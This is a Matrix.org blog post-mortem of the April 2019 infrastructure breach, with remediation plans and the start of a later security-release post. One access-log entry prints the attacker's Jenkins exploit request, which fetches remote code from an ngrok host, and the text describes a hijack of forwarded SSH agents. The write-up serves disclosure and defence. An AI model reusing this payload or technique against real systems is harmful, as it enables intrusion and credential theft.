Matthew Hodgson

160 posts tagged with "Matthew Hodgson"

Post-mortem and remediations for Apr 11 security incident

08.05.2019 00:00 — General Matthew Hodgson

Table of contents

Introduction

Hi all,

On April 11th we dealt with a major security incident impacting the infrastructure which runs the Matrix.org homeserver - specifically: removing an attacker who had gained superuser access to much of our production network. We provided updates at the time as events unfolded on April 11 and 12 via Twitter and our blog, but in this post we’ll try to give a full analysis of what happened and, critically, what we have done to avoid this happening again in future. Apologies that this has taken several weeks to put together: the time-consuming process of rebuilding after the breach has had to take priority, and we also wanted to get the key remediation work in place before writing up the post-mortem.

Firstly, please understand that this incident was not due to issues in the Matrix protocol itself or the wider Matrix network - and indeed everyone who wasn’t on the Matrix.org server should have barely noticed. If you see someone say “Matrix got hacked”, please politely but firmly explain to them that the servers which run the oldest and biggest instance got compromised via a Jenkins vulnerability and bad ops practices, but the protocol and network themselves were not impacted. This is not to say that the Matrix protocol itself is bug-free - indeed we are still in the process of exiting beta (delayed by this incident) - but this incident was not related to the protocol.

Before we get stuck in, we would like to apologise unreservedly to everyone impacted by this whole incident. Matrix is an altruistic open source project, and our mission is to try to make the world a better place by providing a secure decentralised communication protocol and network for the benefit of everyone; giving users total control back over how they communicate online.

In this instance, our focus on trying to improve the protocol and network came at the expense of investing sysadmin time around the legacy Matrix.org homeserver and project infrastructure which we provide as a free public service to help bootstrap the Matrix ecosystem, and we paid the price.

This post will hopefully illustrate that we have learnt our lessons from this incident and will not be repeating them - and indeed intend to come out of this episode stronger than you can possibly imagine :)

Meanwhile, if you think that the world needs Matrix, please consider supporting us via Patreon or Liberapay. Not only will this make it easier for us to invest in our infrastructure in future, it also makes projects like Pantalaimon (E2EE compatibility for all Matrix clients/bots) possible, which are effectively being financed entirely by donations. The funding we raised in Jan 2018 is not going to last forever, and we are currently looking into new longer-term funding approaches - for which we need your support.

Finally, if you happen across security issues in Matrix or matrix.org’s infrastructure, please please consider disclosing them responsibly to us as per our Security Disclosure Policy, in order to help us improve our security while protecting our users.

History

Firstly, some context about Matrix.org’s infrastructure. The public Matrix.org homeserver and its associated services run across roughly 30 hosts, spanning the actual homeserver, its DBs, load balancers, intranet services, website, bridges, bots, integrations, video conferencing, CI, etc. We provide it as a free public service to the Matrix ecosystem to help bootstrap the network and make life easier for first-time users.

The deployment which was compromised in this incident was mainly set up back in Aug 2017 when we vacated our previous datacenter at short notice, thanks to our funding situation at the time. Previously we had been piggybacking on the well-managed production datacenters of our previous employer, but during the exodus we needed to move as rapidly as possible, and so we spun up a bunch of vanilla Debian boxes on UpCloud and shifted over services as simply as we could. We had no dedicated ops people on the project at that point, so this was a subset of the Synapse and Riot/Web dev teams putting on ops hats to rapidly get set up, whilst also juggling the daily fun of keeping the ever-growing Matrix.org server running and trying to actually develop and improve Matrix itself.

In practice, this meant that some corners were cut that we expected to be able to come back to and address once we had dedicated ops staff on the team. For instance, we skipped setting up a VPN for accessing production in favour of simply SSHing into the servers over the internet. We also went for the simplest possible config management system: checking all the configs for the services into a private git repo. And we didn’t spend much time hardening the default Debian installations - for instance, the default image allows root login and SSH agent forwarding over SSH, and we never tweaked that config. This is particularly unfortunate, given our previous production OS (a customised Debian variant) had got all these things right - but the attitude was that because we’d got this right in the past, we’d easily be able to get it right in future once we fixed up the hosts with proper configuration management etc.

Separately, we also made the controversial decision to maintain a public-facing Jenkins instance. We did this deliberately, despite the risks associated with running a complicated publicly available service like Jenkins, but reasoned that as a FOSS project, it is imperative that we are transparent and that continuous integration results and artefacts are available and directly visible to all contributors - whether they are part of the core dev team or not. So we put Jenkins on its own host, gave it some macOS build slaves, and resolved to keep an eye open for any security alerts which would require an upgrade.

Lots of stuff then happened over the following months - we secured funding in Jan 2018; the French Government began talking about switching to Matrix around the same time; the pressure of getting Matrix (and Synapse and Riot) out of beta and to a stable 1.0 grew ever stronger; the challenge of handling the ever-increasing traffic on the Matrix.org server soaked up more and more time, and we started to see our first major security incidents (a major DDoS in March 2018, mitigated by shielding behind Cloudflare, and various attacks on the more beta bits of Matrix itself).

The good news was that this funding meant that in March 2018 we were able to hire a full-time ops specialist! By this point, however, we had two new critical projects in play to try to ensure long-term funding for the project via New Vector, the startup formed in 2017 to hire the core team: firstly, to build out Modular.im as a commercial-grade Matrix SaaS provider, and secondly, to support France in rolling out their massive Matrix deployment as a flagship example of how Matrix can be used. And so, for better or worse, the brand new ops team was given a very clear mandate: to largely ignore the legacy datacenter infrastructure, and instead focus exclusively on building entirely new, pro-grade infrastructure for Modular.im and France, with the expectation of eventually migrating Matrix.org itself into Modular when ready (or just turning off the Matrix.org server entirely, once we have account portability).

So we ended up with two production environments: the legacy Matrix.org infra, whose shortcomings continued to linger and fester off the radar, and separately all the new Modular.im hosts, which are almost entirely operationally isolated from the legacy datacenter, are managed exclusively by Ansible, and have sensible SSH configs which disallow root login etc. With 20:20 hindsight, the failure to prioritise hardening the legacy infrastructure is quite a good example of the normalisation of deviance - we had gotten too used to the bad practices, all our attention was going elsewhere, and so we simply failed to prioritise getting back to fix them.

The Incident

The first evidence of things going wrong was a message from JaikeySarraf, a security researcher who kindly reached out via Twitter DM at the end of Apr 9th to warn us that our Jenkins was outdated after stumbling across it via Google. In practice, our Jenkins was running version 2.117 with plugins which had been updated on an ad hoc basis, and we had indeed missed the relevant security advisory (partially because most of our CI pipelines had moved to TravisCI, CircleCI and Buildkite), and so on Apr 10th we updated Jenkins and investigated to see if any vulnerabilities had been exploited.

In this process, we spotted an unrecognised SSH key in /root/.ssh/authorized_keys2 on the Jenkins build server. This was suspicious both because the key was not in our key DB and because it was stored in the obscure authorized_keys2 file (a legacy location from back when OpenSSH transitioned from SSH1 to SSH2). Further inspection showed that 19 hosts in total had the same key present in the same place.

At this point we started doing forensics to understand the scope of the attack and plan the response, as well as taking snapshots of the hosts to protect data in case the attacker realised we were aware and attempted to vandalise or cover their tracks. Findings were:

  • The attacker gained access by exploiting a vulnerability in our outdated Jenkins (via the checkScriptCompile endpoint, as shown in this access log entry):

matrix.org:443 151.34.xxx.xxx - - [13/Mar/2019:18:46:07 +0000] "GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27orange.tw%27,%20root=%27http://5f36xxxx.ngrok.io/jenkins/%27)%0A@Grab(group=%27tw.orange%27,%20module=%270x3a%27,%20version=%27000%27)%0Aimport%20Orange; HTTP/1.1" 500 6083 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"

  • This allowed them to further compromise a Jenkins slave (Flywheel, an old Mac Pro used mainly for continuous integration testing of Riot/iOS and Riot/Android). The attacker put an SSH key on the box, which was unfortunately exposed to the internet via a high-numbered SSH port for ease of admin by remote users, and placed a trap which waited for any user to SSH into the jenkins user with a forwarded agent; the trap would then hijack the forwarded agent to try to add the attacker’s SSH key to root@ on as many other hosts as possible.
  • On Apr 4th at 12:32 GMT, one of the Riot devops team members SSH’d into the Jenkins slave to perform some admin, forwarding their SSH key for convenience for accessing other boxes while doing so. This triggered the trap, and resulted in the majority of the malicious keys being inserted to the remote hosts.
  • From this point on, the attacker proceeded to explore the network, selectively exfiltrating data (e.g. our passbolt database, which is thankfully end-to-end encrypted via GPG), seemingly hunting for credentials and data for use in onward exploits, and installing backdoors for later use (e.g. a setuid root shell at /usr/share/bsd-mail/shroot).
  • The majority of access to the hosts occurred between Apr 4th and 6th.
  • There was no evidence of large-scale data exfiltration, based on analysing network logs.
  • There was no evidence of Modular.im hosts having been compromised. (Modular’s provisioning system and DB did run on the old infrastructure, but it was not used to tamper with the modular instances themselves).
  • There was no evidence of the identity server databases having been compromised.
  • There was no evidence of tampering in our source code repositories.
  • There was no evidence of tampering of our distributed software packages.
  • Two more hosts were compromised on Apr 5th by similarly hijacking another developer’s SSH agent as they logged into a production server.

By around 2am on Apr 11th we felt that we had sufficient visibility on the attacker’s behaviour to be able to do a first pass at evicting them by locking down SSH, removing their keys, and blocking as much network traffic as we could.

We then started a full rebuild of the datacenter on the morning of Apr 11th, given that the only responsible course of action when an attacker has acquired root is to salt the earth and start over afresh. This meant rotating all secrets; isolating the old hosts entirely (including ones which appeared not to have been compromised, for safety); spinning up entirely new hosts; and redeploying everything from scratch with the fresh secrets. The process was significantly slowed down by colliding with unplanned maintenance and provisioning issues at the datacenter provider, and by unexpected delays waiting to copy data volumes between datacenters, but by 1am on Apr 12th the core matrix.org server was back up, and we had enough of a website up to publish the initial security incident blog post. (This was actually static HTML, faked by editing the generated WordPress content from the old website. We opted not to transition any WordPress deployments to the new infra, in a bid to keep our attack surface as small as possible going forwards.)

Given the production database had been accessed, we had no choice but to drop all access_tokens for matrix.org to stop the attacker accessing user accounts, causing a forced logout for all users on the server. We also recommended all users change their passwords, given the salted & hashed (4096 rounds of bcrypt) passwords had likely been exfiltrated.

At about 4am we had enough of the bare necessities back up and running to pause for sleep.

The Defacement

At around 7am, we were woken up to the news that the attacker had managed to replace the matrix.org website with a defacement (as per https://github.com/vector-im/riot-web/issues/9435). It looks like the attacker didn’t think we were being transparent enough in our initial blog post, and wanted to make it very clear that they had access to many hosts, including the production database, and had indeed exfiltrated password hashes. Unfortunately it took a few hours for the defacement to get on our radar, as our monitoring infrastructure hadn’t yet been fully restored and the normal paging infrastructure wasn’t back up (we now have emergency-emergency-paging for this eventuality).

On inspection, it transpired that the attacker had not compromised the new infrastructure, but had used Cloudflare to repoint the DNS for matrix.org to a defacement site hosted on Github. Now, as part of rotating the secrets which had been compromised via our configuration repositories, we had of course rotated the Cloudflare API key (used to automate changes to our DNS) during the rebuild on Apr 11. When you log into Cloudflare, it looks something like this...

Cloudflare login UI

...where the top account is your personal one, and the bottom one is an admin role account. To rotate the admin API key, we clicked on the admin account to log in as the admin, and then went to the Profile menu, found the API keys and hit the Change API Key button.

Unfortunately, when you do this, it turns out that the API Key it changes is your personal one, rather than the admin one. As a result, in our rush we thought we’d rotated the admin API key, but we hadn’t, thus accidentally enabling the defacement.

To flush out the defacement we logged in directly as the admin user and changed the API key, pointed the DNS back at the right place, and continued on with the rebuild.

The Rebuild

The goal of the rebuild has been to get all the higher priority services back up rapidly - whilst also ensuring that good security practices are in place going forwards. In practice, this meant making some immediate decisions about how to ensure the new infrastructure did not suffer the same issues and fate as the old. Firstly, we ensured the most obvious mistakes that made the breach possible were mitigated:

  • Access via SSH restricted as heavily as possible
  • SSH agent forwarding disabled server-side
  • All configuration to be managed by Ansible, with secrets encrypted in vaults, rather than sitting in a git repo.

Then, whilst reinstating services on the new infra, we opted to review everything being installed for security risks, replacing components with more secure alternatives where needed, even if it slowed down the rebuild. In particular, this meant:

  • Jenkins has been replaced by Buildkite
  • WordPress has been replaced by statically generated sites (e.g. Gatsby)
  • cgit has been replaced by GitLab
  • Entirely new package building, signing & distribution infrastructure (more on that later)
  • etc.

Now, while we restored the main synapse (homeserver), sydent (identity server), sygnal (push server), databases, load balancers, intranet and website on Apr 11, it’s important to understand that there were over 100 other services running on the infra - which is why it is taking a while to get full parity with where we were before.

In the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing service list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:

Service status

Apologies again that it took longer to get some of these services back up than we’d preferred (and that there are still a few pending). Once we got the top priority ones up, we had no choice but to juggle the remainder alongside remediation work, other security work, and actually working on Matrix(!), whilst ensuring that the services we restored were being restored securely.

Remediations

Once the majority of the P1 and P2 services had been restored, on Apr 24 we held a formal retrospective for the team on the whole incident, which in turn kicked off a full security audit over the entirety of our infrastructure and operational processes.

We’d like to share the resulting remediation plan in as much detail as possible, in order to show the approach we are taking, and in case it helps others avoid repeating the mistakes of our past. Inevitably we’re going to have to skip over some of the items, however - after all, remediations imply that there’s something that could be improved, and for obvious reasons we don’t want to dig into areas where remediation work is still ongoing. We will aim to provide an update on these once ongoing work is complete, however.

We should also acknowledge that after being removed from the infra, the attacker chose to file a set of GitHub issues on Apr 12 to highlight some of the security issues that they had taken advantage of during the breach. Their observations matched the findings from our forensics on Apr 10, and their suggested remediations aligned with our plan.

We’ve split the remediation work into the following domains.

SSH

Some of the biggest issues exposed by the security breach concerned our use of SSH, which we’ll take in turn:

SSH agent forwarding should be disabled.

SSH agent forwarding is a beguilingly convenient mechanism which allows a user to ‘forward’ access to their private SSH keys to a remote server whilst logged in, so they can in turn access other servers via SSH from that server. Typical uses are to make it easy to copy files between remote servers via scp or rsync, or to interact with a SCM system such as Github via SSH from a remote server. Your private SSH keys end up available for use by the server for as long as you are logged into it, letting the server impersonate you.

The common wisdom on this tends to be something like: “Only use agent forwarding when connecting to trusted hosts”. For instance, Github’s guide to using SSH agent forwarding says:

Warning: You may be tempted to use a wildcard like Host * to just apply this setting (ForwardAgent: yes) to all SSH connections. That's not really a good idea, as you'd be sharing your local SSH keys with every server you SSH into. They won't have direct access to the keys, but they will be able to use them as you while the connection is established. You should only add servers you trust and that you intend to use with agent forwarding

As a result, several of the team doing ops work had set Host *.matrix.org ForwardAgent: yes in their ssh client configs, thinking “well, what can we trust if not our own servers?”

This was a massive, massive mistake.

If there is one lesson everyone should learn from this whole mess, it is: SSH agent forwarding is incredibly unsafe, and in general you should never use it. Not only can malicious code running on the server as that user (or root) hijack your credentials, but your credentials can in turn be used to access hosts behind your network perimeter which might otherwise be inaccessible. All it takes is someone to have snuck malicious code on your server waiting for you to log in with a forwarded agent, and boom, even if it was just a one-off ssh -A.

Our remediations for this are:

  • Disable all ssh agent forwarding on the servers.
  • If you need to jump through a box to SSH into another box, use ssh -J $host (see the sketch after this list).
  • This can also be used with rsync via rsync -e "ssh -J $host".
  • If you need to copy files between machines, use rsync rather than scp (OpenSSH 8.0’s release notes explicitly recommend using more modern protocols than scp).
  • If you need to regularly copy stuff from one server to another (or use SSH to GitHub to check out something from a private repo), it might be better to have a specific SSH ‘deploy key’ created for this, stored server-side and only able to perform limited actions.
  • If you just need to check out stuff from public git repos, use https rather than git+ssh.
  • Try to educate everyone on the perils of SSH agent forwarding: if our past selves can’t be a good example, they can at least be a horrible warning...
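
For example, here’s a minimal sketch of jump-host access without agent forwarding (the host names are placeholders rather than real hosts):

```
# Hop through a bastion without ever forwarding your agent
ssh -J bastion.example.com admin@internal-host.example.com

# Copy files the same way: rsync tunnelled through the bastion
rsync -e "ssh -J bastion.example.com" ./backup.tar.gz admin@internal-host.example.com:/srv/backups/
```

The same behaviour can be made permanent with a ProxyJump directive in ~/.ssh/config for the hosts concerned, which gives the multi-hop convenience people usually want from agent forwarding without ever exposing the agent to the intermediate host.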

Another approach could be to allow forwarding, but configure your SSH agent to prompt whenever a remote app tries to access your keys. However, not all agents support this (OpenSSH’s does via ssh-add -c, but gnome-keyring for instance doesn’t), and also it might still be possible for a hijacker to race with the valid request to hijack your credentials.

SSH should not be exposed to the general internet

Needless to say, SSH is no longer exposed to the general internet. We are rolling out a VPN as the main access to the dev network, with SSH bastion hosts as the only access point into production, using SSH keys to restrict access to be as minimal as possible.

SSH keys should give minimal access

Another major problem was that individual SSH keys gave very broad access. We have gone through and ensured that SSH keys grant the least privilege required for the users in question. In particular, root login should not be available over SSH.

A typical scenario where users might end up with unnecessary access to production is developers who simply want to push new code or check its logs. We are mitigating this by switching over to using continuous deployment infrastructure everywhere, rather than developers having to actually SSH into production. For instance, the new matrix.org blog is continuously deployed into production by Buildkite from GitHub without anyone needing to SSH anywhere. Similarly, logs should be available to developers from a logserver in real time, without having to SSH into the actual production host; we’ve already been experimenting internally with Sentry for this.

Relatedly, we’ve also shifted to requiring multiple SSH keys per user (per device, and for privileged / unprivileged access), giving us finer-grained control over locking down permissions and revoking individual keys. (We had actually already started this process, and while it didn’t help prevent the attack, it did assist with forensics.)

Two factor authentication

We are rolling out two-factor authentication for SSH to ensure that even if keys are compromised (e.g. via forwarding hijack), the attacker needs to have also compromised other physical tokens in order to successfully authenticate.

It should be made as hard as possible to add malicious SSH keys

We’ve decided to stop users from being able to directly manage their own SSH keys in production via ~/.ssh/authorized_keys (or ~/.ssh/authorized_keys2 for that matter) - we can see no benefit from letting non-root users set keys.

Instead, keys for all accounts are managed exclusively by Ansible via /etc/ssh/authorized_keys/$account (using sshd’s AuthorizedKeysFile /etc/ssh/authorized_keys/%u directive).
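
As a rough sketch of what this looks like on a host (the account names are illustrative):

```
# /etc/ssh/sshd_config (excerpt)
AuthorizedKeysFile /etc/ssh/authorized_keys/%u

# Keys then live in root-owned, Ansible-managed files such as:
#   /etc/ssh/authorized_keys/alice
#   /etc/ssh/authorized_keys/bob
# and the per-user ~/.ssh/authorized_keys{,2} files are no longer consulted at all.
```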

Changes to SSH keys should be carefully monitored

If we’d had sufficient monitoring of the SSH configuration, the breach could have been caught instantly. We are addressing this by managing the keys exclusively via Ansible, and also by improving our intrusion detection in general.

Similarly, we are working on tracking changes and additions to other credentials (and enforcing their complexity).

SSH config should be hardened, disabling unnecessary options

If we’d gone through reviewing the default sshd config when we set up the datacenter in the first place, we’d have caught several of these failure modes at the outset. We’ve now done so (as per above).

We’d like to recommend that OpenSSH packages start shipping with secure-by-default configurations, as a number of the old options just don’t need to exist on most newly provisioned machines.
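
For illustration, the sort of secure-by-default baseline we mean looks something like the following (a sketch of standard sshd_config hardening options, not a verbatim copy of our production config):

```
# Illustrative sshd_config hardening - not our exact config
PermitRootLogin no
PasswordAuthentication no
ChallengeResponseAuthentication no
AllowAgentForwarding no
X11Forwarding no
```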

Network architecture

As mentioned in the History section, the legacy network infrastructure effectively grew organically, without really having a core network or a good split between different production environments.

We are addressing this by:

  • Splitting our infrastructure into strictly separated service domains, which are firewalled from each other and can only access each other via their respective ‘front doors’ (e.g. HTTPS APIs exposed at the loadbalancers).
    • Development
    • Intranet
    • Package Build (airgapped; see below for more details)
    • Package Distribution
    • Production, which is in turn split per class of service.
  • Access to these networks will be via VPN + SSH jumpboxes (as per above). Access to the VPN is via per-device certificate + 2FA, and SSH via keys as per above.
  • Switching to an improved internal VPN between hosts within a given network environment (i.e. we don’t trust the datacenter LAN).

We’re also running most services in containers by default going forwards (previously it was a bit of a mix of running unix processes, VMs, and occasional containers), providing an additional level of namespace isolation.

Keeping patched

Needless to say, this particular breach would not have happened had we kept the public-facing Jenkins patched (although there would of course still have been scope for a 0-day attack).

Going forwards, we are establishing a formal regular process for deploying security updates rather than relying on spotting security advisories on an ad hoc basis. We are now also setting up regular vulnerability scans against production so we catch any gaps before attackers do.
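
As one hedged example of a building block for such a process on Debian-based hosts (an illustration of the idea rather than a description of our exact setup), unattended-upgrades can apply security updates automatically between scans:

```
# Illustration only: automatic security updates on a Debian-style host
apt-get install unattended-upgrades

# /etc/apt/apt.conf.d/20auto-upgrades
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Unattended-Upgrade "1";
```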

Aside from our infrastructure, we’re also extending this process of regularly checking for security updates to cover outdated dependencies in our distributed software (Riot, Synapse, etc) too, given the discipline of regularly chasing outdated software applies equally to both.

Moving all our machine deployment and configuration into Ansible allows this to be a much simpler task than before.

Intrusion detection

There’s obviously a lot we need to do in terms of spotting future attacks as rapidly as possible. Amongst other strategies, we’re working on real-time log analysis for aberrant behaviour.

Incident management

There is much we have learnt from managing an incident at this scale. The main highlights taken from our internal retrospective are:

  • The need for a single incident manager to coordinate the technical response, prioritisation, and handover between those handling the incident. (We lacked a single incident manager at first, given several of the team started off that week on holiday...)
  • The benefits of gathering all relevant info and checklists onto a canonical set of shared documents rather than being spread across different chatrooms and lost in scrollback.
  • The need to have an existing inventory of services and secrets available for tracking progress and prioritisation
  • The need to have a general incident management checklist for future reference, which folks can familiarise themselves with ahead of time to avoid stuff getting forgotten. The sort of stuff which will go on our checklist in future includes:
    • Remembering to appoint a named incident manager, external comms manager & internal comms manager. (They could of course be the same person, but the roles are distinct.)
    • Defining a sensible sequence for forensics, mitigations, communication, rotating secrets etc, so that it is followed rather than having to work it out on the fly and risk forgetting stuff
    • Remembering to inform the ICO (Information Commissioner’s Office) of any user data breaches
    • Guidelines on how to balance between forensics and rebuilding (i.e. how long to spend on forensics, if at all, before pulling the plug)
    • Reminders to snapshot systems for forensics & backups
    • Reminder to not redesign infrastructure during a rebuild. There were a few instances where we lost time by seizing the opportunity to try to fix design flaws whilst rebuilding, some of which were avoidable.
    • Making sure that communication isn’t sent prematurely to users (e.g. we posted the blog post asking people to update their passwords before password reset had actually been restored - apologies for that.)

Configuration management

One of the major flaws once the attacker was in our network was that our internal configuration git repo was cloned on most accounts on most servers, containing within it a plethora of unencrypted secrets. Config would then get symlinked from the checkout to wherever the app or OS needed it.

This is bad in terms of leaving unencrypted secrets (database passwords, API keys etc) lying around everywhere, but also in terms of being able to automatically maintain configuration and spot unauthorised configuration changes.

Our solution is to switch all configuration management, from the OS upwards, to Ansible (which we had already established for Modular.im), using Ansible vaults to store the encrypted secrets. It’s unfortunate that we had already done the work for this (and even had been giving talks at Ansible meetups about it!) but had not yet applied it to the legacy infrastructure.
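
A minimal sketch of the pattern (the file and variable names here are made up for illustration):

```
# Encrypt a whole secrets file so only ciphertext is ever committed to git
ansible-vault encrypt group_vars/matrix/vault.yml

# ...or encrypt a single value for inlining into an existing vars file
ansible-vault encrypt_string 'not-a-real-password' --name 'example_db_password'

# Supply the vault passphrase at deploy time
ansible-playbook site.yml --ask-vault-pass
```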

Avoiding temporary measures which last forever

None of this would have happened had we been more disciplined in finishing off the temporary infrastructure from back in 2017. As a general point, we should try and do it right the first time - and failing that, assign responsibility to someone to update it and assign responsibility to someone else to check. In other words, the only way to dig out of temporary measures like this is to project manage the update or it will not happen. This is of course a general point not specific to this incident, but one well worth reiterating.

Secure packaging

One of the most unfortunate mistakes highlighted by the breach is that the signing keys for the Synapse debian repository, Riot debian repository and Riot/Android releases on the Google Play Store had ended up on hosts which were compromised during the attack. This is obviously a massive fail, and is a case of the geo-distributed dev teams prioritising the convenience of a near-automated release process without thinking through the security risks of storing keys on a production server.

Whilst the keys were compromised, none of the packages that we distribute were tampered with. However, the impact on the project has been high - particularly for Riot/Android, as we cannot allow the risk of an attacker using the keys to sign and somehow distribute malicious variants of Riot/Android, and Google provides no means of recovering from a compromised signing key beyond creating a whole new app and starting over. Therefore we have lost all our ratings, reviews and download counts on Riot/Android and started over. (If you want to give the newly released app a fighting chance despite this setback, feel free to give it some stars on the Play Store). We also revoked the compromised Synapse & Riot GPG keys and created new ones (and published new instructions for how to securely set up your Synapse or Riot debian repos).

In terms of remediation, designing a secure build process is surprisingly hard, particularly for a geo-distributed team. What we have landed on is as follows:

  • Developers create a release branch to signify a new release (ensuring dependencies are pinned to known good versions).
  • We then perform all releases from a dedicated isolated release terminal.
    • This is a device which is kept disconnected from the internet, other than when doing a release, and even then it is firewalled to be able to pull data from SCM and push to the package distribution servers, but otherwise entirely isolated from the network.
    • Needless to say, the device is strictly used for nothing other than performing releases.
    • The build environment installation is scripted and installs on a fresh OS image (letting us easily build new release terminals as needed)
    • The signing keys (hardware or software) are kept exclusively on this device.
    • The publishing SSH keys (hardware or software) used to push to the packaging servers are kept exclusively on this device.
    • We physically store the device securely.
    • We ensure someone on the team always has physical access to it in order to do emergency builds.
  • Meanwhile, releases are distributed using dedicated infrastructure, entirely isolated from the rest of production.
    • These live at https://packages.matrix.org and https://packages.riot.im
    • These are minimal machines with nothing but a static web-server.
    • They are accessed only via the dedicated SSH keys stored on the release terminal.
    • These in turn can be mirrored in future to avoid a SPOF (or we could cheat and use Cloudflare’s always online feature, for better or worse).

Alternatives here included:

  • In an ideal world we’d do reproducible builds instead, and sign the build’s hash with a hardware key, but given we don’t have reproducible builds yet this will have to suffice for now.
  • We could delegate building and distribution entirely to a 3rd party setup such as OBS (as per https://github.com/matrix-org/matrix.org/issues/370). However, we have a very wide range of artefacts to build across many different platforms and OSes, so would rather build ourselves if we can.

Dev and CI infrastructure

The main change in our dev and CI infrastructure is to move from Jenkins to Buildkite. The latter has been serving us well for Synapse builds over the last few months, and has now been extended to serve all the main CI pipelines that Jenkins was providing. Buildkite works by orchestrating jobs on an elastic pool of CI workers we host in our own AWS, and so far has done so quite painlessly.

The new pipelines have been set up so that where CI needs to push artefacts to production for continuous deployment (e.g. riot.im/develop), it does so by poking production via HTTPS to trigger production to pull the artefact from CI, rather than pushing the artefact via SSH to production.
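
A hedged sketch of that pull-rather-than-push flow (the hook URL, token and variables are hypothetical, not our actual deployment hook):

```
# CI step: notify production that a new artefact exists - no SSH keys involved
curl -fsS -X POST \
     -H "Authorization: Bearer $DEPLOY_HOOK_TOKEN" \
     "https://deploy.example.com/hooks/riot-develop?build=$BUILD_NUMBER"

# Production then pulls the named artefact from CI over HTTPS, verifies it,
# and swaps it into place - CI never holds credentials to push into production.
```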

Other than CI, our strategy is:

  • Continue using Github for public repositories
  • Use gitlab.matrix.org for private repositories (and stuff which we don’t want to re-export via the US, like Olm)
  • Continue to host docker images on Docker Hub (despite their recent security dramas).

Log minimisation and handling Personally Identifying Information (PII)

Another thing that the breach made painfully clear is that we log too much. While there’s not much evidence of the attacker going spelunking through any Matrix service log files, the fact is that whilst developing Matrix we’ve kept logging on matrix.org relatively verbose to help with debugging. There’s nothing more frustrating than trying to trace through the traffic for a bug only to discover that logging didn’t pick it up.

However, we can still improve our logging and PII-handling substantially:

  • Ensuring that wherever possible, we hash or at least truncate any PII before logging it (access tokens, matrix IDs, 3rd party IDs etc) - see the sketch after this list.
  • Minimising log retention to the bare minimum we need to investigate recent issues and abuse
  • Ensuring that PII is stored hashed wherever possible.
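
As a trivial illustration of the hash-and-truncate idea (the variable and log line are invented for the example):

```
# Illustration only: log a truncated fingerprint of a token, never the raw value
token_fingerprint=$(printf '%s' "$ACCESS_TOKEN" | sha256sum | cut -c1-12)
echo "request authenticated with token sha256:${token_fingerprint}..." >> app.log
```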

Meanwhile, in Matrix itself we already are very mindful of handling PII (c.f. our privacy policies and GDPR work), but there is also more we can do, particularly:

  • Turning on end-to-end encryption by default, so that even if a server is compromised, the attacker cannot get at private message history. Everyone who uses E2EE in Matrix should have felt some relief that even though the server was compromised, their message history was safe: we need to provide that to everyone. This is https://github.com/vector-im/riot-web/issues/6779.
  • We need device audit trails in Matrix, so that even if a compromised server (or malicious server admin) temporarily adds devices to your account, you can see what’s going on. This is https://github.com/matrix-org/synapse/issues/5145
  • We need to empower users to configure history retention in their rooms, so they can limit the amount of history exposed to an attacker. This is https://github.com/matrix-org/matrix-doc/pull/1763
  • We need to provide account portability (aka decentralised accounts) so that even if a server is compromised, the users can seamlessly migrate elsewhere. The first step of this is https://github.com/matrix-org/matrix-doc/pull/1228.

Conclusion

Hopefully this gives a comprehensive overview of what happened in the breach, how we handled it, and what we are doing to protect against this happening in future.

Again, we’d like to apologise for the massive inconvenience this caused to everyone caught in the crossfire. Thank you for your patience and for sticking with the project whilst we restored systems. And while it is very unfortunate that we ended up in this situation, we should at least come out of it much stronger, particularly in terms of infrastructure security. We’d also like to particularly thank Kade Morton for providing an independent review of this post and our remediations, everyone who reached out with #hugops during the incident (it was literally the only positive thing we had on our radar), and finally those of the Matrix team who hauled ass to rebuild the infrastructure, as well as those who doubled down meanwhile to keep the rest of the project on track.

On which note, we’re going to go back to building decentralised communication protocols and reference implementations for a bit... Emoji reactions are on the horizon (at last!), as is Message Editing, RiotX/Android and a host of other long-awaited features - not to mention finally releasing Synapse 1.0. So: thanks again for flying Matrix, even during this period of extreme turbulence and, uh, hijack. Things should mainly be back to normal now and for the foreseeable.

Given the new blog doesn't have comments yet, feel free to discuss the post over at HN.

Security updates: Sydent 1.0.3, Synapse 0.99.3.1 and Riot/Android 0.9.0 / 0.8.99 / 0.8.28a

03.05.2019 00:00 — General Matthew Hodgson

Hi all,

Over the last few weeks we’ve ended up getting a lot of attention from the security research community, which has been incredibly useful and massively appreciated in terms of contributions to improve the security of the reference Matrix implementations.

We’ve also set up an official Security Disclosure Policy to explain the process of reporting security issues to us safely via responsible disclosure - including a Hall of Fame to credit those who have done so. (Please mail [email protected] to remind us if we’ve forgotten you!).

Since we published the Hall of Fame yesterday, we’ve already been getting new entries and so we’re doing a set of security releases today to ensure they are mitigated asap. Unfortunately the work around this means that we’re running late in publishing the post mortem of the Apr 11 security incident - we are trying to get that out as soon as we can.

Sydent 1.0.3

Sydent 1.0.3 has three security fixes:

  • Ensure that authentication tokens are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. This is an important fix - please update. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing the issue!
  • Mitigate an HTML injection bug where an invalid room_id could result in malicious HTML being injected into validation emails. The fix for this is in the email template itself; you will need to update any customised email templates to be protected. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!
  • Randomise session_ids to avoid leaking info about the total number of identity validations, and whether a given ID has been validated. Thanks to @fs0c131y for identifying and responsibly disclosing this one.

If you are running Sydent as an identity server, you should update as soon as possible from https://github.com/matrix-org/sydent/releases/v1.0.3. We are not aware of any of these issues having been exploited maliciously in the wild.

Synapse 0.99.3.1

Synapse 0.99.3.1 is a security update for two fixes:

  • Ensure that random IDs in Synapse are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue!
  • Add 0.0.0.0/32 and ::/128 to the URL preview blacklist configuration, ensuring that an attacker cannot make connections to localhost. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!

You can update from https://github.com/matrix-org/synapse/releases or similar as normal. We are not aware of any of these issues having been exploited maliciously in the wild.

(Synapse 0.99.3.2 was released shortly afterwards to fix a non-security issue with the Debian packaging)

Riot/Android 0.9.x/0.8.99 (Google Play) and 0.8.28a (F-Droid)

Riot/Android has an important security fix which shipped over the course of the last week in various versions of the app:

